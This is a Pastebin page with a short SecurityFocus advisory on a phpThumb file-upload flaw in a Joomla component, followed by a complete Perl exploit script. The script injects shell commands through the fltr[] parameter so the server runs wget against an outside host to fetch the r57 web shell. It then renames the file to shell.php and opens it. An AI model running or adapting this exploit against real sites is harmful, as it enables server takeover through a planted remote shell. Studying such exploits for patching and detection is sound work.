Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- source: http://www.securityfocus.com/bid/64041/info
- phpThumb is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.
- An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
- Note: This BID was previously titled 'Joomla! Alphacontent Component 'phpThumb.php' Arbitrary File Upload Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.
- #!/usr/bin/perl
- use LWP::UserAgent;
- use HTTP::Request;
- $target = $ARGV[0];
- if($target eq '')
- {
- print "======================================================\n";
- print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
- print "======================================================\n";
- sleep(0.8);
- print "Usage: perl exploit.pl <target> \n";
- exit(1);
- }
- if ($target !~ /http:\/\//)
- {
- $target = "http://$target";
- }
- #print "[*] Enter the address of your hosted TXT shell (ex: '
- http://c99.gen.tr/r57.txt') => ";
- #$shell = <STDIN>;
- sleep(1);
- print "======================================================\n";
- print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
- print "======================================================\n";
- sleep(1.1);
- print "[*] Testing exploit ... \n";
- sleep(1.1);
- $agent = LWP::UserAgent->new();
- $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
- Firefox/14.0.1');
- $shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
- $website =
- "$target/components/com_alphacontent/assets/phpThumb/phpThumb.php??src=file.jpg&fltr
- []=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
- &phpThumbDebug=9";
- $request = $agent->request(HTTP::Request->new(GET=>$website));
- if ($request->is_success)
- {
- print "[+] Exploit sent with success. \n";
- sleep(1.4);
- }
- else
- {
- print "[-] Exploit sent but probably the website is not vulnerable. \n";
- sleep(1.3);
- }
- print "[*] Checking if the txt shell has been uploaded...\n";
- sleep(1.2);
- $cwebsite =
- "$target/components/com_alphacontent/assets/phpThumb/shell.txt";
- $creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
- if ($creq->is_success)
- {
- print "[+] Txt Shell uploaded :) \n";
- sleep(1);
- print "[*] Moving it to PHP format... Please wait... \n";
- sleep(1.1);
- $mvwebsite =
- "$target/components/com_alphacontent/assets/phpThumb/phpThumb.php?
- src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
- jpeg:fail.jpg ; mv shell.txt shell.php ;
- &phpThumbDebug=9";
- $mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
- $cwebsite =
- "$target/components/com_alphacontent/assets/phpThumb/shell.php";
- $c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
- if ($c2req->is_success)
- {
- print "[+] PHP Shell uploaded => $cwebsite :) \n";
- sleep(0.8);
- print "[*] Do you want to open it? (y/n) => ";
- $open = <STDIN>;
- if ($open == "y")
- {
- $firefox = "firefox $cwebsite";
- system($firefox);
- }
- }
- else
- {
- print "[-] Error while moving shell from txt to PHP :( \n";
- exit(1);
- }
- }
- else
- {
- print "[-] Txt shell not uploaded. :( \n";
- }
- « Previous Exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement